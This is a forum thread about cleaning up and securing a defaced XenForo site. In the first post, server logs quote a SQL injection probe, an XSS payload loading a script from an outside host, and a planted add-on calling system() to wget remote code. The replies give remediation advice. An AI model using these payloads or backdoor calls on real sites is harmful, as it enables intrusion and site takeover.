How to properly secure a hosted website and stop defacement / hacks?

[koa]

Hi, I am helping another user on XF here (that's french and doesn't know English well) and boy, his website is getting hit hard by hackers.

To me with my limited knowledge of the topic, they've found an exploit by an addon that isn't supported here and who's been blocked from selling addons. They've SQL inject to deface.

Spoiler: Server Errors

array (3) {  ["url"] => string (178) "https://virtual-gaming.fr/members/nunox92.594/recent-content?_xfNoRedirect=-1"%20OR%202%2b769-769-1=0% 2b0% 2b0% 2b1% 20 -% 20 & _xfRequestUri = / members / nunox92.594 / json = & _ xfResponseType "  ["_GET"] => array (3) {    ["_xfNoRedirect"] => string (30) "-1" OR 2 + 769-769-1 = 0 + 0 + 0 + 1 - "    ["_xfRequestUri"] => string (21) "/members/nunox92.594/"    ["_xfResponseType"] => string (4) "json"  }  ["_POST"] => array (0) {  } }

# 0 [internal function]: XenForo_Application :: handlePhpError (2, 'system (): Unabl ...', '/ homepages / 7 / d6 ...', 13, Array) # 1 /homespages/7/d675201067/htdocs/www/library/VirtualGaming/ProfilCustom/ControllerPublic/Custom.php(13): system ('wget https: // cd ...') # 2 /homespages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(369): VirtualGaming_ProfilCustom_ControllerPublic_Custom-> actionCustomProfile () # 3 /homepages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(152): XenForo_FrontController-> dispatch (Object (XenForo_RouteMatch)) # 4 /homepages/7/d675201067/htdocs/www/index.php(13): XenForo_FrontController-> run () # 5 {main}

["url"] => string (358) "https://virtual-gaming.fr/members/nunox92.594/recent-content?_xfNoRedirect=1&_xfRequestUri=/members/nunox92.594/&_xfResponseType=json </ script> <svg / onload = '% 2b / "/% 2b / onmouseover = 1 / 2b% (s = document.createElement (/script/.source) 2cs.src% = (/% 2c / 2b% / bxss.me% 5c / s = 002 626% 3FU% 26r% 26h = 1024-5795 = 1024-9115a-2 26% /). slice (2)% 2cdocument.documentElement.appendChild (s)) // '> "

They've have backups but these backups contain shells that allows the hackers to continue hacking the site:

Spoiler: Server Errors

# 0 [internal function]: XenForo_Application :: handlePhpError (2, 'system (): Unabl ...', '/ homepages / 7 / d6 ...', 13, Array)
# 1 /homespages/7/d675201067/htdocs/www/library/VirtualGaming/ProfilCustom/ControllerPublic/Custom.php(13): system ('wget https: // cd ...')
# 2 /homespages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(369): VirtualGaming_ProfilCustom_ControllerPublic_Custom-> actionCustomProfile ()
# 3 /homepages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(152): XenForo_FrontController-> dispatch (Object (XenForo_RouteMatch))
# 4 /homepages/7/d675201067/htdocs/www/index.php(13): XenForo_FrontController-> run ()
# 5 {main}

The above log happened after removing the first addon.

So it looks like with above listed addons, and what another developer knows as ... cookie exploit?, They're gaining access pretty easily.

So before we try to find all of these files that the hackers uploaded (or can we call them no-life kids?), what are steps to take from stopping this altogether?

• How to stop php from executing files and removing directories
• Stop any future XSS/SQL exploits if possible
• What would be the proper file permissions for the server?
• Other developer suggests that the addons listed in the above code are clear and isn't a reason for the exploits,but I have to disagree. Who is right?

Xenforo Version: 1.5.16a
Host: 1&1
PHP: 7.0

Thanks!

 

[Ozzy47]

As was explained here, https://xenforo.com/community/threads/third-deface-attack.139312/post-1206286

Take the site offline and firewall via whitelist only to your IP.

Create a new xenforo install.

Perform a xenforo to xenforo import. Leave everything behind except what is imported by xenforo and known to be safe/clean.

Get a new, secured server set up.

Move your now known clean xenforo to your new server.

Ive done this for several people in the past, hit me up if you want a quote

Also, remove any add-ons from said developer.

 

[koa]

As was explained here, https://xenforo.com/community/threads/third-deface-attack.139312/post-1206286



Also, remove any add-ons from said developer.

This is the best way to do this, I agree, but does the XF2XF import also import addon data? The site is pretty addon reliant. I don't think this would be an option if not.

Also I still would like some answers on file permissions and to avoid this from happening in the future.

 

[Ozzy47]

I will leave this to someone more familiar with this sort of thing to answer you.

 

[TPerry]

AFAIK it will NOT import add-on data.
All you could do is contact those add-on authors and see if possible to write a process to import them into the new DB - but it's most likely going to be cost prohibitive.

Another option is to lock down the site to restricted IP access and then contact someone to clean the server/site up....

As far as file permissions go... /data and /internal_data can have world write access, but I usually restrict it to the HTTP service and PHP processor.

 

[Optic]

they've found an exploit by an addon that isn't supported here and who's been blocked from selling addons. They've SQL inject to deface.

You’re wasting your time trying to fix this addon if that’s the case. The addon needs to be written to mitigate SQL injections for ALL input fields. Adjusting file permissions will do nothing if they have full access to your database anyway via SQL injections.

What addon is it? Can you find an alternative from a reputable trusted developer? How many members/entries does this addon use? Can you manually copy and paste values into the new plugin by using a Login as User plugin maybe?

As everyone has said above you must start fresh on a newly setup server, fresh XF install and import your old XF install and absolutely only install trusted addons.